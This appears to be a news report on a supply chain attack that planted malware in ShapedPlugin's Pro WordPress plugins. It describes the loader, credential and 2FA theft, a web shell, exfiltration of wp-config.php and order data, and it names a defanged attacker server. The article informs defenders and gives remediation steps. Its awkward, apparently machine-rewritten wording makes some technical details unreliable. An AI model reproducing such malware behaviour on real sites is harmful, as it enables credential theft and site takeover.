ShapedPlugin WordPress Pro plugins Installed behind Supply Chain Attack
Many WordPress plugins from ShapedPlugin have been vulnerable to supply chain attacks after unknown actors were able to disrupt legitimate channels and push backend code.
“The attackers compromised the build and distribution pipeline of the seller, injecting backend code into the Pro plugin release that is distributed through officially licensed update channels,” Wordfence said in an analysis published last week.
The incident affects the following plugins –
- WooCommerce product slider (versions before 3.5.4)
- Real Testimonials Pro (version 3.2.5)
- Smart Post Show Pro (versions before 4.0.2)
As mentioned above, it should be emphasized that the compromise only affects the creation of the Pro plugin that is distributed through the Easy Digital Downloads (EDD) infrastructure of the seller via account.shapedplugin.[.]com. Free versions of plugins on WordPress.org are not affected.
The supply chain vulnerability related to Product Slider Pro for WooCommerce has been assigned the CVE identifier CVE-2026-49777, and a CVSS score of 10.0, indicating high severity. CVE-2026-10735 (CVSS score: 9.8) is the CVE index of the entire incident.
The WordPress security company said that compromised versions of the plugins include a loader that is launched on every admin page, causing it to download the payload from a remote server (“194.76.217)[.]28:2871”), install it, and run it as a fake plugin.
Once activated, the malware reports the victim’s domain back to the server and deletes itself to cover tracks and complicate incident response efforts. A fake plugin, on the other hand, hides itself in the WordPress plugin admin directory and is able to take credentials with plaintext and two-factor authentication (2FA) codes.
It also implements multiple persistence methods that allow an arbitrary file to write to a custom REST endpoint if given a specific authentication token, as well as drop a web shell with command execution features. Finally, it uses a PHP file called “install-persistent.php,” which is included as part of the plugin, to extract the data below –
- The complete contents of wp-config.php, including information, authentication keys, and debugging settings
- All administrator accounts have registration dates
- Mail plugin authentication from WP Mail SMTP, Send SMTP, and Easy WP SMTP
- WooCommerce order data from the last 3 months by payment method
Once this information is displayed, the file is deleted. Evidence suggests that the attack may have been a disruption of the construction pipeline, rather than a direct poisoning of the packages.
What is most dangerous about this attack is that it exposes site owners who have purchased legitimate licenses and installed updates from the vendor’s official update system to the malware.
After being informed of the issue, ShapedPlugin has confirmed the incident, adding that it is reviewing its distribution and release processes to ensure the integrity of its products going forward. New versions of the affected plugins are expected to be released pending full security reviews and validation testing.
Site owners who have installed malicious versions are recommended to reset all passwords, revoke and regenerate 2FA passwords for all users, review administrator accounts for unauthorized additions, and check mail plugin settings for modified SMTP credentials.
